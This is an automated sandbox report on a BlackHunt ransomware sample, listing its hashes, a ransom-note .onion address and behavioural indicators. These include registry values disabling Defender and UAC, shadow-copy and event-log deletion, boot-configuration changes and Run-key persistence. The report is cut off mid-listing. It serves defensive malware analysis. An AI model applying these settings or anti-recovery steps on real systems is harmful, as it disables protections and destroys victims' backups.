Analysis
-
max time kernel
92s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 01:06
Static task
static1
Behavioral task
behavioral1
Sample
db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe
Resource
win10v2004-20231215-en
General
-
Target
db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe
-
Size
707KB
-
MD5
3969e1ae286fc9b3d1e8bf8eb0914d5b
-
SHA1
75b6371812c5c2384a66d027257127236712739a
-
SHA256
db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531
-
SHA512
a915163b7786c80056573e88c2f5963f387a9cae41383fb2ae720ccc8991d0b8d77b8a0679c6e660d29e764cfca902633a0dae0a53ee4adc3573ee8d797dfd60
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1k8mvnh:6uaTmkZJ+naie5OTamgEoKxLWnYh
Malware Config
Extracted
C:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6328 fsutil.exe 5356 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1032 wevtutil.exe 4032 wevtutil.exe 11100 wevtutil.exe 11112 wevtutil.exe 4876 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6528 bcdedit.exe 5936 bcdedit.exe 6024 bcdedit.exe 3960 bcdedit.exe -
Renames multiple (3396) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5972 wbadmin.exe 13336 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\A: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\L: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\B: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\O: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\P: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\Y: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\X: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\W: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\E: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\K: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\U: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\J: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\V: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\I: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\S: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\N: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Q: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\R: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\T: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\Z: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened (read-only) \??\M: db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk-1.8\jre\lib\cmm\#BlackHunt_ReadMe.txt db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\cs_get.svg db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\#BlackHunt_ReadMe.txt db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\#BlackHunt_ReadMe.txt db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\ui-strings.js db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-focus_32.svg db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\ui-strings.js db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files\VideoLAN\VLC\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\#BlackHunt_ReadMe.txt db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\#BlackHunt_ReadMe.txt db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\ui-strings.js db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-il\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\#BlackHunt_ReadMe.txt db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ms_get.svg db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\line_2x.png db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files\VideoLAN\VLC\locale\be\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ar-ae\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\pdf.gif db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\ui-strings.js db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fil_get.svg db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\#BlackHunt_ReadMe.txt db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\he-il\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files\Java\jre-1.8\lib\ext\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\#BlackHunt_ReadMe.txt db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\ui-strings.js db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ui-strings.js db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sk-sk\ui-strings.js db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\#BlackHunt_ReadMe.txt db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\da-dk\#BlackHunt_Private.key db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\ui-strings.js db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_checkbox_selected_18.svg db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\ui-strings.js db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\editvideoimage.png db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\ui-strings.js db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-il\#BlackHunt_ReadMe.txt db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\main-selector.css db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\upsell-2x.png db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ja_135x40.svg db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\uk-ua\#BlackHunt_ReadMe.hta db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 8604 11840 WerFault.exe 289 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5700 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6336 vssadmin.exe 6344 vssadmin.exe 4000 vssadmin.exe 6120 vssadmin.exe 5864 vssadmin.exe 14392 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 11096 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3512 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe Token: SeRestorePrivilege 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe Token: SeBackupPrivilege 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe Token: SeTakeOwnershipPrivilege 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe Token: SeAuditPrivilege 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe Token: SeSecurityPrivilege 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe Token: SeIncBasePriorityPrivilege 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe Token: SeBackupPrivilege 6672 vssvc.exe Token: SeRestorePrivilege 6672 vssvc.exe Token: SeAuditPrivilege 6672 vssvc.exe Token: SeBackupPrivilege 10448 wbengine.exe Token: SeRestorePrivilege 10448 wbengine.exe Token: SeSecurityPrivilege 10448 wbengine.exe Token: SeSecurityPrivilege 1032 wevtutil.exe Token: SeBackupPrivilege 1032 wevtutil.exe Token: SeSecurityPrivilege 4032 wevtutil.exe Token: SeBackupPrivilege 4032 wevtutil.exe Token: SeSecurityPrivilege 11100 wevtutil.exe Token: SeBackupPrivilege 11100 wevtutil.exe Token: SeSecurityPrivilege 11112 wevtutil.exe Token: SeBackupPrivilege 11112 wevtutil.exe Token: SeSecurityPrivilege 4876 wevtutil.exe Token: SeBackupPrivilege 4876 wevtutil.exe Token: SeDebugPrivilege 11096 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2148 wrote to memory of 2220 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 167 PID 2148 wrote to memory of 2220 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 167 PID 2148 wrote to memory of 2768 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 165 PID 2148 wrote to memory of 2768 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 165 PID 2148 wrote to memory of 3744 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 41 PID 2148 wrote to memory of 3744 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 41 PID 2148 wrote to memory of 4956 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 162 PID 2148 wrote to memory of 4956 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 162 PID 2148 wrote to memory of 2256 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 160 PID 2148 wrote to memory of 2256 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 160 PID 2220 wrote to memory of 2740 2220 cmd.exe 159 PID 2220 wrote to memory of 2740 2220 cmd.exe 159 PID 2148 wrote to memory of 4748 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 158 PID 2148 wrote to memory of 4748 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 158 PID 2768 wrote to memory of 5036 2768 cmd.exe 156 PID 2768 wrote to memory of 5036 2768 cmd.exe 156 PID 2148 wrote to memory of 1176 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 155 PID 2148 wrote to memory of 1176 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 155 PID 2148 wrote to memory of 1952 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 154 PID 2148 wrote to memory of 1952 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 154 PID 3744 wrote to memory of 4264 3744 cmd.exe 152 PID 3744 wrote to memory of 4264 3744 cmd.exe 152 PID 4956 wrote to memory of 4324 4956 cmd.exe 45 PID 4956 wrote to memory of 4324 4956 cmd.exe 45 PID 2148 wrote to memory of 2700 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 44 PID 2148 wrote to memory of 2700 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 44 PID 2148 wrote to memory of 4148 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 150 PID 2148 wrote to memory of 4148 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 150 PID 2148 wrote to memory of 4592 2148 